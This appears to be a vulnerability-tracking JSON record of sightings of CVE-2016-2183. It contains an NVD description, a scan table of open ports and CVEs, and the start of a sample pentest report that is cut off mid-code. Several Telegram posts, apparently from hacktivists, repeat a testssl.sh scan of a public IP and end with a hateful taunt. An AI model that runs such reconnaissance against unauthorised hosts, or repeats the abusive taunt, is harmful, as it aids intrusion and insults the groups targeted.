{"vulnerability": "cve-2016-2183", "sightings": [{"uuid": "f36c18c0-a2be-42b2-a163-41e328bad4a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2016-2183", "type": "seen", "source": "https://infosec.exchange/users/certvde/statuses/115093680188761999", "content": "", "creation_timestamp": "2025-08-26T06:36:28.916487Z"}, {"uuid": "80286d08-cc7a-4c81-8886-c1fc7755a7ab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2016-2183", "type": "published-proof-of-concept", "source": "Telegram/cQf2CT3r4WvnJhAn_Z5tbBdbHlIor2zaa0XkqChp6pgA9CQ", "content": "", "creation_timestamp": "2025-12-13T09:00:04.000000Z"}, {"uuid": "2d857ff8-553b-460f-b6f9-3ec2a3a2b6be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2016-2183", "type": "seen", "source": "https://infosec.exchange/users/certvde/statuses/116362045594819401", "content": "", "creation_timestamp": "2026-04-07T06:38:29.141687Z"}, {"uuid": "7cd2f2f0-d241-4e78-9d23-36ba604bbdac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2016-2183", "type": "seen", "source": "https://bsky.app/profile/certvde.infosec.exchange.ap.brid.gy/post/3miv663v4rpz2", "content": "", "creation_timestamp": "2026-04-07T06:38:33.050774Z"}, {"uuid": "804d205f-dbc0-45c9-954e-ead94850d3e1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2016-2183", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/10542", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-0296\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: The Birthday attack against 64-bit block ciphers flaw (CVE-2016-2183) was reported for the health checks port (9979) on etcd grpc-proxy component. Even though the CVE-2016-2183 has been fixed in the etcd components, to enable periodic health checks from kubelet, it was necessary to open up a new port (9979) on etcd grpc-proxy, hence this port might be considered as still vulnerable to the same type of vulnerability. The health checks on etcd grpc-proxy do not contain sensitive data (only metrics data), therefore the potential impact related to this vulnerability is minimal. The CVE-2023-0296 has been assigned to this issue to track the permanent fix in the etcd component.\n\ud83d\udccf Published: 2023-01-17T00:00:00.000Z\n\ud83d\udccf Modified: 2025-04-04T18:48:51.215Z\n\ud83d\udd17 References:\n1. https://bugzilla.redhat.com/show_bug.cgi?id=2161287", "creation_timestamp": "2025-04-04T19:36:56.000000Z"}, {"uuid": "aabb0827-722d-43e5-a5d7-c412d5f0b4ac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2016-2183", "type": "seen", "source": "https://t.me/ETHICALHACKERSCOMMUNITY2/3548", "content": "\u2521\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2547\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2547\u2501\u2501\u2501\u2501\u2501\u2501\u2547\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2529\n\u2502 192.168.0.10 \u2502          \u2502      \u2502            \u2502\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 \u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\n\n[Open ports]\n\u250f\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2533\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2533\u2501\u2501\u2501\u2501\u2501\u2501\u2533\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2533\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2533\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2513\n\u2503 ip           \u2503 proto \u2503 port \u2503 service     \u2503 product      \u2503 version                       \u2503\n\u2521\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2547\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2547\u2501\u2501\u2501\u2501\u2501\u2501\u2547\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2547\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2547\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2529\n\u2502 192.168.0.10 \u2502 tcp   \u2502 21   \u2502 ftp         \u2502 ProFTPD      \u2502 1.3.5                      \u2502\n\u2502 192.168.0.10 \u2502 tcp   \u2502 22   \u2502 ssh         \u2502 OpenSSH      \u2502 6.6.1p1 Ubuntu 2ubuntu2.10 \u2502\n\u2502 192.168.0.10 \u2502 tcp   \u2502 80   \u2502 http        \u2502 Apache httpd \u2502 2.4.7                      \u2502\n\u2502 192.168.0.10 \u2502 tcp   \u2502 445  \u2502 netbios-ssn \u2502 Samba smbd   \u2502 3.X - 4.X                  \u2502\n\u2502 192.168.0.10 \u2502 tcp   \u2502 631  \u2502 ipp         \u2502 CUPS         \u2502 1.7                        \u2502\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\n\n[Vulnerabilities]\n\u250f\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2533\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2533\u2501\u2501\u2501\u2501\u2501\u2501\u2533\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2533\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2513\n\u2503 ip           \u2503 proto \u2503 port \u2503 vuln_name                                                           \u2503 cve            \u2503\n\u2521\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2547\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2547\u2501\u2501\u2501\u2501\u2501\u2501\u2547\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2547\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2529\n\u2502 192.168.0.10 \u2502 tcp   \u2502 0    \u2502 TCP Timestamps Information Disclosure (https://www.kitploit.com/search/label/Information%20Disclosure)                               \u2502 N/A            \u2502\n\u2502 192.168.0.10 \u2502 tcp   \u2502 21   \u2502 FTP Unencrypted Cleartext Login                                     \u2502 N/A            \u2502\n\u2502 192.168.0.10 \u2502 tcp   \u2502 22   \u2502 Weak MAC Algorithm(s) Supported (SSH)                               \u2502 N/A            \u2502\n\u2502 192.168.0.10 \u2502 tcp   \u2502 22   \u2502 Weak Encryption Algorithm(s) Supported (SSH)                        \u2502 N/A            \u2502\n\u2502 192.168.0.10 \u2502 tcp   \u2502 22   \u2502 Weak Host Key Algorithm(s) (SSH)                                    \u2502 N/A            \u2502\n\u2502 192.168.0.10 \u2502 tcp   \u2502 22   \u2502 Weak Key Exchange (KEX) Algorithm(s) Supported (SSH)                \u2502 N/A            \u2502\n\u2502 192.168.0.10 \u2502 tcp   \u2502 80   \u2502 Test HTTP dangerous methods                                            \u2502 N/A            \u2502\n\u2502 192.168.0.10 \u2502 tcp   \u2502 80   \u2502 Drupal Core SQLi Vulnerability (SA-CORE-2014-005) - Active Check    \u2502 CVE-2014-3704  \u2502\n\u2502 192.168.0.10 \u2502 tcp   \u2502 80   \u2502 Drupal Coder RCE Vulnerability (SA-CONTRIB-2016-039) - Active Check \u2502 N/A            \u2502\n\u2502 192.168.0.10 \u2502 tcp   \u2502 80   \u2502 Sensitive File Disclosure (HTTP)                                    \u2502 N/A            \u2502\n\u2502 192.168.0.10 \u2502 tcp   \u2502 80   \u2502 Unprotected Web App / Device Installers (HTTP)                      \u2502 N/A            \u2502\n\u2502 192.168.0.10 \u2502 tcp   \u2502 80   \u2502 Cleartext Transmission of Sensitive Information (https://www.kitploit.com/search/label/Sensitive%20Information) via HTTP            \u2502 N/A            \u2502\n\u2502 192.168.0.10 \u2502 tcp   \u2502 80   \u2502 jQuery &lt; 1.9.0 XSS Vulnerability                                    \u2502 CVE-2012-6708  \u2502\n\u2502 192.168.0.10 \u2502 tcp   \u2502 80   \u2502 jQuery &lt; 1.6.3 XSS Vulnerability                                    \u2502 CVE-2011-4969  \u2502\n\u2502 192.168.0.10 \u2502 tcp   \u2502 80   \u2502 Drupal 7.0 Information Disclosure Vulnerability - Active Check      \u2502 CVE-2011-3730  \u2502\n\u2502 192.168.0.10 \u2502 tcp   \u2502 631  \u2502 SSL/TLS: Report Vulnerable Cipher Suites for HTTPS                  \u2502 CVE-2016-2183  \u2502\n\u2502 192.168.0.10 \u2502 tcp   \u2502 631  \u2502 SSL/TLS: Report Vulnerable Cipher Suites for HTTPS                  \u2502 CVE-2016-6329  \u2502\n\u2502 192.168.0.10 \u2502 tcp   \u2502 631  \u2502 SSL/TLS: Report Vulnerable Cipher Suites for HTTPS                  \u2502 CVE-2020-12872 \u2502\n\u2502 192.168.0.10 \u2502 tcp   \u2502 631  \u2502 SSL/TLS: Deprecated TLSv1.0 and TLSv1.1 Protocol Detection          \u2502 CVE-2011-3389  \u2502\n\u2502 192.168.0.10 \u2502 tcp   \u2502 631  \u2502 SSL/TLS: Deprecated TLSv1.0 and TLSv1.1 Protocol Detection          \u2502 CVE-2015-0204  \u2502\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500&amp;   #9472;\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\n\n[Users]", "creation_timestamp": "2024-01-08T12:19:23.000000Z"}, {"uuid": "0b9cc534-7b41-44ac-90f3-167e2286a131", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2016-2183", "type": "seen", "source": "https://t.me/endsodomaofficial/7318", "content": "====== Running in file batch mode with file=\"hosts/ips.txt\" ======\n\n==========================\n/root/Tools/testssl.sh/testssl.sh --quiet --color 0 -U --warnings=batch 77.81.101.111\n\n\n Start 2024-02-14 22:13:09                --&gt;&gt; 77.81.101.111:443 (77.81.101.111) &lt;&lt;--\n\n rDNS (77.81.101.111):   --\n Service detected:       HTTP\n\n\n Testing vulnerabilities\n\n Heartbleed (CVE-2014-0160)                not vulnerable (OK), no heartbeat extension\n CCS (CVE-2014-0224)                       not vulnerable (OK)\n Ticketbleed (CVE-2016-9244), experiment.  not vulnerable (OK)\n ROBOT                                     not vulnerable (OK)\n Secure Renegotiation (RFC 5746)           supported (OK)\n Secure Client-Initiated Renegotiation     not vulnerable (OK)\n CRIME, TLS (CVE-2012-4929)                not vulnerable (OK)\n BREACH (CVE-2013-3587)                    no gzip/deflate/compress/br HTTP compression (OK)  - only supplied \"/\" tested\n POODLE, SSL (CVE-2014-3566)               not vulnerable (OK)\n TLS_FALLBACK_SCSV (RFC 7507)              Downgrade attack prevention supported (OK)\n SWEET32 (CVE-2016-2183, CVE-2016-6329)    not vulnerable (OK)\n FREAK (CVE-2015-0204)                     not vulnerable (OK)\n DROWN (CVE-2016-0800, CVE-2016-0703)      not vulnerable on this host and port (OK)\n                                           make sure you don't use this certificate elsewhere with SSLv2 enabled services, see\n                                           https://search.censys.io/search?resource=hosts&amp;virtual_hosts=INCLUDE&amp;q=84359F27151AC6F21A23D865CCD523FADB0B99CE8E33878E67081E5BFF1D759C\n LOGJAM (CVE-2015-4000), experimental      common prime with 2048 bits detected: HAProxy (2048 bits),\n                                           but no DH EXPORT ciphers\n BEAST (CVE-2011-3389)                     TLS1: ECDHE-RSA-AES256-SHA\n                                                 HE-RSA-AES256-SHA\n                                                 CDHE-RSA-AES128-SHA\n                                                 HE-RSA-AES128-SHA\n                                                 ES256-SHA\n                                                 ES128-SHA\n                                           VULNERABLE -- but also supports higher protocols  TLSv1.1 TLSv1.2 (likely mitigated)\n LUCKY13 (CVE-2013-0169), experimental     potentially VULNERABLE, uses cipher block chaining (CBC) ciphers with TLS. Check patches\n Winshock (CVE-2014-6321), experimental    not vulnerable (OK)\n RC4 (CVE-2013-2566, CVE-2015-2808)        no RC4 ciphers detected (OK)\n\n\n Done 2024-02-14 22:15:15 [ 152s] --&gt;&gt; 77.81.101.111:443 (77.81.101.111) &lt;&lt;--\n\nYou got fucked RealitateaTV MOSSAD ISIS, Zionist Bastard \ud83d\ude01", "creation_timestamp": "2024-02-15T00:49:09.000000Z"}, {"uuid": "13c34206-ab4f-4efb-aa46-e0fd5f69f1c9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2016-2183", "type": "seen", "source": "https://t.me/jokerssec/1351", "content": "====== Running in file batch mode with file=\"hosts/ips.txt\" ======\n\n==========================\n/root/Tools/testssl.sh/testssl.sh --quiet --color 0 -U --warnings=batch 77.81.101.111\n\n\n Start 2024-02-14 22:13:09                --&gt;&gt; 77.81.101.111:443 (77.81.101.111) &lt;&lt;--\n\n rDNS (77.81.101.111):   --\n Service detected:       HTTP\n\n\n Testing vulnerabilities\n\n Heartbleed (CVE-2014-0160)                not vulnerable (OK), no heartbeat extension\n CCS (CVE-2014-0224)                       not vulnerable (OK)\n Ticketbleed (CVE-2016-9244), experiment.  not vulnerable (OK)\n ROBOT                                     not vulnerable (OK)\n Secure Renegotiation (RFC 5746)           supported (OK)\n Secure Client-Initiated Renegotiation     not vulnerable (OK)\n CRIME, TLS (CVE-2012-4929)                not vulnerable (OK)\n BREACH (CVE-2013-3587)                    no gzip/deflate/compress/br HTTP compression (OK)  - only supplied \"/\" tested\n POODLE, SSL (CVE-2014-3566)               not vulnerable (OK)\n TLS_FALLBACK_SCSV (RFC 7507)              Downgrade attack prevention supported (OK)\n SWEET32 (CVE-2016-2183, CVE-2016-6329)    not vulnerable (OK)\n FREAK (CVE-2015-0204)                     not vulnerable (OK)\n DROWN (CVE-2016-0800, CVE-2016-0703)      not vulnerable on this host and port (OK)\n                                           make sure you don't use this certificate elsewhere with SSLv2 enabled services, see\n                                           https://search.censys.io/search?resource=hosts&amp;virtual_hosts=INCLUDE&amp;q=84359F27151AC6F21A23D865CCD523FADB0B99CE8E33878E67081E5BFF1D759C\n LOGJAM (CVE-2015-4000), experimental      common prime with 2048 bits detected: HAProxy (2048 bits),\n                                           but no DH EXPORT ciphers\n BEAST (CVE-2011-3389)                     TLS1: ECDHE-RSA-AES256-SHA\n                                                 HE-RSA-AES256-SHA\n                                                 CDHE-RSA-AES128-SHA\n                                                 HE-RSA-AES128-SHA\n                                                 ES256-SHA\n                                                 ES128-SHA\n                                           VULNERABLE -- but also supports higher protocols  TLSv1.1 TLSv1.2 (likely mitigated)\n LUCKY13 (CVE-2013-0169), experimental     potentially VULNERABLE, uses cipher block chaining (CBC) ciphers with TLS. Check patches\n Winshock (CVE-2014-6321), experimental    not vulnerable (OK)\n RC4 (CVE-2013-2566, CVE-2015-2808)        no RC4 ciphers detected (OK)\n\n\n Done 2024-02-14 22:15:15 [ 152s] --&gt;&gt; 77.81.101.111:443 (77.81.101.111) &lt;&lt;--\n\nYou got fucked RealitateaTV MOSSAD ISIS, Zionist Bastard \ud83d\ude01", "creation_timestamp": "2024-02-15T03:00:05.000000Z"}, {"uuid": "b781c8a6-a062-4d2d-be91-134d4b751051", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2016-2183", "type": "seen", "source": "https://t.me/marianaalecu/3622", "content": "====== Running in file batch mode with file=\"hosts/ips.txt\" ======\n\n==========================\n/root/Tools/testssl.sh/testssl.sh --quiet --color 0 -U --warnings=batch 77.81.101.111\n\n\n Start 2024-02-14 22:13:09                --&gt;&gt; 77.81.101.111:443 (77.81.101.111) &lt;&lt;--\n\n rDNS (77.81.101.111):   --\n Service detected:       HTTP\n\n\n Testing vulnerabilities\n\n Heartbleed (CVE-2014-0160)                not vulnerable (OK), no heartbeat extension\n CCS (CVE-2014-0224)                       not vulnerable (OK)\n Ticketbleed (CVE-2016-9244), experiment.  not vulnerable (OK)\n ROBOT                                     not vulnerable (OK)\n Secure Renegotiation (RFC 5746)           supported (OK)\n Secure Client-Initiated Renegotiation     not vulnerable (OK)\n CRIME, TLS (CVE-2012-4929)                not vulnerable (OK)\n BREACH (CVE-2013-3587)                    no gzip/deflate/compress/br HTTP compression (OK)  - only supplied \"/\" tested\n POODLE, SSL (CVE-2014-3566)               not vulnerable (OK)\n TLS_FALLBACK_SCSV (RFC 7507)              Downgrade attack prevention supported (OK)\n SWEET32 (CVE-2016-2183, CVE-2016-6329)    not vulnerable (OK)\n FREAK (CVE-2015-0204)                     not vulnerable (OK)\n DROWN (CVE-2016-0800, CVE-2016-0703)      not vulnerable on this host and port (OK)\n                                           make sure you don't use this certificate elsewhere with SSLv2 enabled services, see\n                                           https://search.censys.io/search?resource=hosts&amp;virtual_hosts=INCLUDE&amp;q=84359F27151AC6F21A23D865CCD523FADB0B99CE8E33878E67081E5BFF1D759C\n LOGJAM (CVE-2015-4000), experimental      common prime with 2048 bits detected: HAProxy (2048 bits),\n                                           but no DH EXPORT ciphers\n BEAST (CVE-2011-3389)                     TLS1: ECDHE-RSA-AES256-SHA\n                                                 HE-RSA-AES256-SHA\n                                                 CDHE-RSA-AES128-SHA\n                                                 HE-RSA-AES128-SHA\n                                                 ES256-SHA\n                                                 ES128-SHA\n                                           VULNERABLE -- but also supports higher protocols  TLSv1.1 TLSv1.2 (likely mitigated)\n LUCKY13 (CVE-2013-0169), experimental     potentially VULNERABLE, uses cipher block chaining (CBC) ciphers with TLS. Check patches\n Winshock (CVE-2014-6321), experimental    not vulnerable (OK)\n RC4 (CVE-2013-2566, CVE-2015-2808)        no RC4 ciphers detected (OK)\n\n\n Done 2024-02-14 22:15:15 [ 152s] --&gt;&gt; 77.81.101.111:443 (77.81.101.111) &lt;&lt;--\n\nYou got fucked RealitateaTV MOSSAD ISIS, Zionist Bastard \ud83d\ude01", "creation_timestamp": "2024-02-15T00:48:21.000000Z"}, {"uuid": "104edea4-f30a-45a3-a416-e45ea0e96237", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2016-2183", "type": "seen", "source": "https://t.me/fucklulzsecisrahell/6294", "content": "====== Running in file batch mode with file=\"hosts/ips.txt\" ======\n\n==========================\n/root/Tools/testssl.sh/testssl.sh --quiet --color 0 -U --warnings=batch 77.81.101.111\n\n\n Start 2024-02-14 22:13:09                --&gt;&gt; 77.81.101.111:443 (77.81.101.111) &lt;&lt;--\n\n rDNS (77.81.101.111):   --\n Service detected:       HTTP\n\n\n Testing vulnerabilities\n\n Heartbleed (CVE-2014-0160)                not vulnerable (OK), no heartbeat extension\n CCS (CVE-2014-0224)                       not vulnerable (OK)\n Ticketbleed (CVE-2016-9244), experiment.  not vulnerable (OK)\n ROBOT                                     not vulnerable (OK)\n Secure Renegotiation (RFC 5746)           supported (OK)\n Secure Client-Initiated Renegotiation     not vulnerable (OK)\n CRIME, TLS (CVE-2012-4929)                not vulnerable (OK)\n BREACH (CVE-2013-3587)                    no gzip/deflate/compress/br HTTP compression (OK)  - only supplied \"/\" tested\n POODLE, SSL (CVE-2014-3566)               not vulnerable (OK)\n TLS_FALLBACK_SCSV (RFC 7507)              Downgrade attack prevention supported (OK)\n SWEET32 (CVE-2016-2183, CVE-2016-6329)    not vulnerable (OK)\n FREAK (CVE-2015-0204)                     not vulnerable (OK)\n DROWN (CVE-2016-0800, CVE-2016-0703)      not vulnerable on this host and port (OK)\n                                           make sure you don't use this certificate elsewhere with SSLv2 enabled services, see\n                                           https://search.censys.io/search?resource=hosts&amp;virtual_hosts=INCLUDE&amp;q=84359F27151AC6F21A23D865CCD523FADB0B99CE8E33878E67081E5BFF1D759C\n LOGJAM (CVE-2015-4000), experimental      common prime with 2048 bits detected: HAProxy (2048 bits),\n                                           but no DH EXPORT ciphers\n BEAST (CVE-2011-3389)                     TLS1: ECDHE-RSA-AES256-SHA\n                                                 HE-RSA-AES256-SHA\n                                                 CDHE-RSA-AES128-SHA\n                                                 HE-RSA-AES128-SHA\n                                                 ES256-SHA\n                                                 ES128-SHA\n                                           VULNERABLE -- but also supports higher protocols  TLSv1.1 TLSv1.2 (likely mitigated)\n LUCKY13 (CVE-2013-0169), experimental     potentially VULNERABLE, uses cipher block chaining (CBC) ciphers with TLS. Check patches\n Winshock (CVE-2014-6321), experimental    not vulnerable (OK)\n RC4 (CVE-2013-2566, CVE-2015-2808)        no RC4 ciphers detected (OK)\n\n\n Done 2024-02-14 22:15:15 [ 152s] --&gt;&gt; 77.81.101.111:443 (77.81.101.111) &lt;&lt;--\n\nYou got fucked RealitateaTV MOSSAD ISIS, Zionist Bastard \ud83d\ude01", "creation_timestamp": "2024-02-15T02:55:48.000000Z"}, {"uuid": "522ecc10-d490-4b85-b662-0e10fcbfb0e2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2016-2183", "type": "seen", "source": "https://t.me/thegoodfatherag/8840", "content": "====== Running in file batch mode with file=\"hosts/ips.txt\" ======\n\n==========================\n/root/Tools/testssl.sh/testssl.sh --quiet --color 0 -U --warnings=batch 77.81.101.111\n\n\n Start 2024-02-14 22:13:09                --&gt;&gt; 77.81.101.111:443 (77.81.101.111) &lt;&lt;--\n\n rDNS (77.81.101.111):   --\n Service detected:       HTTP\n\n\n Testing vulnerabilities\n\n Heartbleed (CVE-2014-0160)                not vulnerable (OK), no heartbeat extension\n CCS (CVE-2014-0224)                       not vulnerable (OK)\n Ticketbleed (CVE-2016-9244), experiment.  not vulnerable (OK)\n ROBOT                                     not vulnerable (OK)\n Secure Renegotiation (RFC 5746)           supported (OK)\n Secure Client-Initiated Renegotiation     not vulnerable (OK)\n CRIME, TLS (CVE-2012-4929)                not vulnerable (OK)\n BREACH (CVE-2013-3587)                    no gzip/deflate/compress/br HTTP compression (OK)  - only supplied \"/\" tested\n POODLE, SSL (CVE-2014-3566)               not vulnerable (OK)\n TLS_FALLBACK_SCSV (RFC 7507)              Downgrade attack prevention supported (OK)\n SWEET32 (CVE-2016-2183, CVE-2016-6329)    not vulnerable (OK)\n FREAK (CVE-2015-0204)                     not vulnerable (OK)\n DROWN (CVE-2016-0800, CVE-2016-0703)      not vulnerable on this host and port (OK)\n                                           make sure you don't use this certificate elsewhere with SSLv2 enabled services, see\n                                           https://search.censys.io/search?resource=hosts&amp;virtual_hosts=INCLUDE&amp;q=84359F27151AC6F21A23D865CCD523FADB0B99CE8E33878E67081E5BFF1D759C\n LOGJAM (CVE-2015-4000), experimental      common prime with 2048 bits detected: HAProxy (2048 bits),\n                                           but no DH EXPORT ciphers\n BEAST (CVE-2011-3389)                     TLS1: ECDHE-RSA-AES256-SHA\n                                                 HE-RSA-AES256-SHA\n                                                 CDHE-RSA-AES128-SHA\n                                                 HE-RSA-AES128-SHA\n                                                 ES256-SHA\n                                                 ES128-SHA\n                                           VULNERABLE -- but also supports higher protocols  TLSv1.1 TLSv1.2 (likely mitigated)\n LUCKY13 (CVE-2013-0169), experimental     potentially VULNERABLE, uses cipher block chaining (CBC) ciphers with TLS. Check patches\n Winshock (CVE-2014-6321), experimental    not vulnerable (OK)\n RC4 (CVE-2013-2566, CVE-2015-2808)        no RC4 ciphers detected (OK)\n\n\n Done 2024-02-14 22:15:15 [ 152s] --&gt;&gt; 77.81.101.111:443 (77.81.101.111) &lt;&lt;--\n\nYou got fucked RealitateaTV MOSSAD ISIS, Zionist Bastard \ud83d\ude01", "creation_timestamp": "2024-02-15T03:24:44.000000Z"}, {"uuid": "c047f746-4105-4f03-bd52-4dc01b957bc8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2016-2183", "type": "seen", "source": "https://t.me/cibsecurity/56622", "content": "\u203c CVE-2023-0296 \u203c\n\nThe Birthday attack against 64-bit block ciphers flaw (CVE-2016-2183) was reported for the health checks port (9979) on etcd grpc-proxy component. Even though the CVE-2016-2183 has been fixed in the etcd components, to enable periodic health checks from kubelet, it was necessary to open up a new port (9979) on etcd grpc-proxy, hence this port might be considered as still vulnerable to the same type of vulnerability. The health checks on etcd grpc-proxy do not contain sensitive data (only metrics data), therefore the potential impact related to this vulnerability is minimal. The CVE-2023-0296 has been assigned to this issue to track the permanent fix in the etcd component.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-01-18T00:15:22.000000Z"}, {"uuid": "ba399fd2-17ab-4a17-8585-f488d97852dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2016-2183", "type": "seen", "source": "https://gist.github.com/tejassesh5/26e63dfa642914dd0891e872144d7d4e", "content": "\n\n\n\nWeb Application Penetration Test Report \u2014 SAMPLE\n\n  * { margin: 0; padding: 0; box-sizing: border-box; }\n  body { font-family: 'Segoe UI', Arial, sans-serif; color: #1a1a2e; background: #fff; font-size: 13px; line-height: 1.6; }\n\n  .cover { page-break-after: always; background: #0f0f1a; color: #fff; min-height: 100vh; display: flex; flex-direction: column; justify-content: space-between; padding: 60px 70px; }\n  .cover-badge { font-size: 10px; letter-spacing: 3px; color: #e63946; text-transform: uppercase; font-weight: 700; margin-bottom: 8px; }\n  .cover h1 { font-size: 32px; font-weight: 700; line-height: 1.2; margin-bottom: 12px; }\n  .cover h1 span { color: #e63946; }\n  .cover-sub { color: #aaa; font-size: 14px; margin-bottom: 40px; }\n  .cover-meta table { border-collapse: collapse; }\n  .cover-meta td { padding: 6px 20px 6px 0; color: #ccc; font-size: 12px; 